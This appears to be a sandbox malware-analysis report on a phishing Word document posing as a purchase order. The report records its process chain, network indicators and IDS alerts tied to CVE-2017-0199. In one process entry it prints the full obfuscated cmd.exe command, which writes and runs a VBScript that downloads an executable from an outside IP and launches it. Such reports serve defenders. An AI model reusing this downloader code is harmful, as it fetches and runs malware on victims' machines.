File name: NEW PO.docx
Full analysis: https://app.any.run/tasks/959850e5-5892-4937-a3ff-682194859568
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 15, 2018, 10:43:28
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
generated-doc
opendir
trojan
loader
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5: 93C3E76659E7893FCEF5F63EF1AFC403
SHA1: BB162586C1A1FAF0D5544F8223748E5ECA6F623E
SHA256: C37ED90B11B277ADA5CC16671052962A85E4B2CAD61079E45655A2A680C1C93E
SSDEEP: 384:TQeNh+wS115Wp39FG6F7//o5wMAqNciBph:OwAk9GAycGP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Downloads executable files from the Internet

      • WScript.exe (PID: 948)
    • Downloads executable files from IP

      • WScript.exe (PID: 948)
    • Application was dropped or rewritten from another process

      • VUHTXN.eXe (PID: 2388)
      • VUHTXN.eXe (PID: 1048)
  • SUSPICIOUS

    • Unusual connect from Microsoft Office

      • WINWORD.EXE (PID: 668)
    • Reads Internet Cache Settings

      • WINWORD.EXE (PID: 668)
      • mshta.exe (PID: 2544)
      • WScript.exe (PID: 948)
    • Executes scripts

      • cmd.exe (PID: 2080)
    • Reads the machine GUID from the registry

      • WScript.exe (PID: 948)
    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 2544)
    • Executable content was dropped or overwritten

      • WScript.exe (PID: 948)
    • Application launched itself

      • VUHTXN.eXe (PID: 1048)
  • INFO

    • Reads settings of System Certificates

      • WINWORD.EXE (PID: 668)
    • Reads internet explorer settings

      • mshta.exe (PID: 2544)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 668)
    • Reads the machine GUID from the registry

      • WINWORD.EXE (PID: 668)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 668)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docx | Word Microsoft Office Open XML Format document (52.2)
.zip | Open Packaging Conventions container (38.8)
.zip | ZIP compressed archive (8.8)

EXIF

XML

AppVersion: 14
HyperlinksChanged: No
SharedDoc: No
CharactersWithSpaces: 70
LinksUpToDate: No
Company: -
TitlesOfParts: -
HeadingPairs:
  • Title
  • 1
ScaleCrop: No
Paragraphs: 1
Lines: 1
DocSecurity: None
Application: Microsoft Office Word
Characters: 61
Words: 10
Pages: 1
TotalEditTime: -
Template: Normal.dotm
ModifyDate: 2018:11:08 13:02:00Z
CreateDate: 2018:11:08 13:02:00Z
RevisionNumber: 2
LastModifiedBy: Olachi

XMP

Creator: Olachi

ZIP

ZipFileName: [Content_Types].xml
ZipUncompressedSize: 1474
ZipCompressedSize: 398
ZipCRC: 0x344b4b79
ZipModifyDate: 1980:01:01 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0006
ZipRequiredVersion: 20
No data.
All screenshots are available in the full report
Total processes: 43
Monitored processes: 6
Malicious processes: 0
Suspicious processes: 4

Behavior graph (interactive in the full report; process chain shown): winword.exe, mshta.exe, cmd.exe, wscript.exe, vuhtxn.exe, vuhtxn.exe

Process information

PID: 668
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\NEW PO.docx"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.5123.5000

PID: 2544
CMD: C:\Windows\System32\mshta.exe -Embedding
Path: C:\Windows\System32\mshta.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft (R) HTML Application host
Exit code: 0
Version: 11.00.9600.16428 (winblue_gdr.131013-1700)

PID: 2080
CMD: "C:\Windows\System32\cmd.exe" /c CD %temp% & @echo set S2zB4rN4jB5pO0tY9pG3qC3nP7xK1l = createobject("wscript.shell") >UKUOJZ.vBS & @echo Dim M4vJ2xP2wO9kP4uU4pY1vS7jA6vW6nK0uW8cW1qW7lH8zH7nQ9gI2uS4yP6iD6o >>UKUOJZ.vBS & @echo Dim U5nZ8aE7kK7jH8uM4pV6wN4vY7bJ7qO0hE7gJ7wR1kG4cE7hR5fH6bL0q >>UKUOJZ.vBS & @echo Dim W8mX0vP3eK6wS8wQ3zZ8jV3hE2zJ8eT2lV5hI4lB3jS7qA6p >>UKUOJZ.vBS & @echo Dim G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t >>UKUOJZ.vBS & @echo M4vJ2xP2wO9kP4uU4pY1vS7jA6vW6nK0uW8cW1qW7lH8zH7nQ9gI2uS4yP6iD6o = "http://31.184.198.161/~winvps/1_com/putt/tny.exe" >>UKUOJZ.vBS & @echo U5nZ8aE7kK7jH8uM4pV6wN4vY7bJ7qO0hE7gJ7wR1kG4cE7hR5fH6bL0q = "VUHTXN.eXe" >>UKUOJZ.vBS & @echo Set W8mX0vP3eK6wS8wQ3zZ8jV3hE2zJ8eT2lV5hI4lB3jS7qA6p = CreateObject("MSXML2.XMLHTTP") >>UKUOJZ.vBS & @echo W8mX0vP3eK6wS8wQ3zZ8jV3hE2zJ8eT2lV5hI4lB3jS7qA6p.Open "GET", M4vJ2xP2wO9kP4uU4pY1vS7jA6vW6nK0uW8cW1qW7lH8zH7nQ9gI2uS4yP6iD6o, False >>UKUOJZ.vBS & @echo W8mX0vP3eK6wS8wQ3zZ8jV3hE2zJ8eT2lV5hI4lB3jS7qA6p.send ("") >>UKUOJZ.vBS & @echo If W8mX0vP3eK6wS8wQ3zZ8jV3hE2zJ8eT2lV5hI4lB3jS7qA6p.Status = 200 Then >>UKUOJZ.vBS & @echo Set G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t = CreateObject("ADODB.Stream") >>UKUOJZ.vBS & @echo G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t.Open >>UKUOJZ.vBS & @echo G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t.Type = 1 >>UKUOJZ.vBS & @echo G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t.Write W8mX0vP3eK6wS8wQ3zZ8jV3hE2zJ8eT2lV5hI4lB3jS7qA6p.ResponseBody >>UKUOJZ.vBS & @echo G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t.Position = 0 >>UKUOJZ.vBS & @echo G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t.SaveToFile U5nZ8aE7kK7jH8uM4pV6wN4vY7bJ7qO0hE7gJ7wR1kG4cE7hR5fH6bL0q, 2 >>UKUOJZ.vBS & @echo G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t.Close >>UKUOJZ.vBS & @echo Set nE= Nothing >>UKUOJZ.vBS & @echo End If >>UKUOJZ.vBS & @echo Set W8mX0vP3eK6wS8wQ3zZ8jV3hE2zJ8eT2lV5hI4lB3jS7qA6p = Nothing >>UKUOJZ.vBS & @echo WScript.Sleep(5000) >>UKUOJZ.VBs& @echo S2zB4rN4jB5pO0tY9pG3qC3nP7xK1l.run(U5nZ8aE7kK7jH8uM4pV6wN4vY7bJ7qO0hE7gJ7wR1kG4cE7hR5fH6bL0q) >>UKUOJZ.vBS & sTaRt UKUOJZ.vbs
Path: C:\Windows\System32\cmd.exe
Parent process: mshta.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 948
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\UKUOJZ.vBS"
Path: C:\Windows\System32\WScript.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Exit code: 0
Version: 5.8.7600.16385

PID: 1048
CMD: "C:\Users\admin\AppData\Local\Temp\VUHTXN.eXe"
Path: C:\Users\admin\AppData\Local\Temp\VUHTXN.eXe
Parent process: WScript.exe
User: admin
Company: tynepc
Integrity Level: MEDIUM
Description: quincubital
Exit code: 0
Version: 5.07

PID: 2388
CMD: C:\Users\admin\AppData\Local\Temp\VUHTXN.eXe"
Path: C:\Users\admin\AppData\Local\Temp\VUHTXN.eXe
Parent process: VUHTXN.eXe
User: admin
Company: tynepc
Integrity Level: MEDIUM
Description: quincubital
Version: 5.07
Total events: 2 521
Read events: 2 102
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 2
Suspicious files: 25
Text files: 35
Unknown types: 4

Dropped files

PID | Process | Filename | Type | MD5 | SHA256
668 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR61A6.tmp.cvr | - | - | -
668 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{D3890850-C0D3-46E8-AEF4-580DA91BDD8F} | - | - | -
668 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{9F57A54E-C5C6-4EA9-B636-133A6245DD16} | - | - | -
668 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\792D9837.doc | - | - | -
668 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD | binary | 204B65807CDA7C92A1368CAFD6D9D925 | 1521D2DE971C5C1BAB4DD06E0A1C42B0F9598A10068F9D01FF92A92AA1873936
668 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF | binary | B7CABB3BB1AB1E12CCBA5F9929AF7128 | 4F20709C2224C2CEA468FC457ECED8416FF2ADE6B7E42C63B8D1F2FDACE13801
668 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6B391981.doc | text | 2B9FE3A1E0EB8DFCB12F3C8E2806CCF3 | E84D431570A6395BE242E3434A5C6AAFB9039357A3B2A1A4E5B13AD0CC1547C5
668 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\ZSM7OJX4.txt | text | 2D5C45D87F48B6EED783FD9D9F1FD5AB | 904DB401B53862C3C0FF0490EA43C7FC33572FDEB8A13979A3A0C25E93001768
668 | WINWORD.EXE | C:\Users\admin\Desktop\~$NEW PO.docx | pgc | 7A51AA69021A5BAC43479C30D0BE582F | CCD4790BFF935C89A07DAC5745701412C4828E02C8A0F9A5E4C013616EDE6634
668 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{2161AA80-9B5D-45BF-B736-8637BDE1583D}.FSD | binary | 67E0B24050CBF6173DDF8D82177C0FC2 | 38EE0F205A50BFFFAF4BAACE88B8D53AAF405555E19E84A458E84156658B84B1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 8
TCP/UDP connections: 5
DNS requests: 1
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
668 | WINWORD.EXE | GET | 304 | 31.184.198.161:80 | http://31.184.198.161/~winvps/1_com/putt/tny.doc | RU | text | 10.3 Kb | suspicious
668 | WINWORD.EXE | GET | 304 | 31.184.198.161:80 | http://31.184.198.161/~winvps/1_com/putt/tny.doc | RU | text | 10.3 Kb | suspicious
668 | WINWORD.EXE | HEAD | 200 | 31.184.198.161:80 | http://31.184.198.161/~winvps/1_com/putt/tny.doc | RU | text | 10.3 Kb | suspicious
668 | WINWORD.EXE | GET | 200 | 31.184.198.161:80 | http://31.184.198.161/~winvps/1_com/putt/tny.doc | RU | text | 10.3 Kb | suspicious
668 | WINWORD.EXE | HEAD | 200 | 31.184.198.161:80 | http://31.184.198.161/~winvps/1_com/putt/tny.doc | RU | text | 10.3 Kb | suspicious
668 | WINWORD.EXE | HEAD | 200 | 31.184.198.161:80 | http://31.184.198.161/~winvps/1_com/putt/tny.doc | RU | text | 10.3 Kb | suspicious
948 | WScript.exe | GET | 200 | 31.184.198.161:80 | http://31.184.198.161/~winvps/1_com/putt/tny.exe | RU | executable | 558 Kb | suspicious
668 | WINWORD.EXE | GET | 200 | 31.184.198.161:80 | http://31.184.198.161/~winvps/1_com/putt/tny.hta | RU | html | 2.29 Kb | suspicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
948 | WScript.exe | 31.184.198.161:80 | - | Petersburg Internet Network ltd. | RU | suspicious
856 | svchost.exe | 104.28.15.54:443 | urlz.fr | Cloudflare Inc | US | shared
668 | WINWORD.EXE | 104.28.15.54:443 | urlz.fr | Cloudflare Inc | US | shared
668 | WINWORD.EXE | 31.184.198.161:80 | - | Petersburg Internet Network ltd. | RU | suspicious

DNS requests

Domain | IP | Reputation
urlz.fr | 104.28.15.54, 104.28.14.54 | shared

Threats

PID | Process | Class | Message
668 | WINWORD.EXE | A Network Trojan was detected | ET CURRENT_EVENTS CVE-2017-0199 Common Obfus Stage 2 DL
668 | WINWORD.EXE | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious HTA application download
668 | WINWORD.EXE | Potentially Bad Traffic | ET POLICY Possible HTA Application Download
668 | WINWORD.EXE | Attempted User Privilege Gain | ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
948 | WScript.exe | A Network Trojan was detected | ET INFO Executable Download from dotted-quad Host
948 | WScript.exe | Potentially Bad Traffic | ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
948 | WScript.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
948 | WScript.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response
668 | WINWORD.EXE | Attempted User Privilege Gain | ET WEB_CLIENT GENERIC VB ShellExecute Function Inside of VBSCRIPT tag
No debug info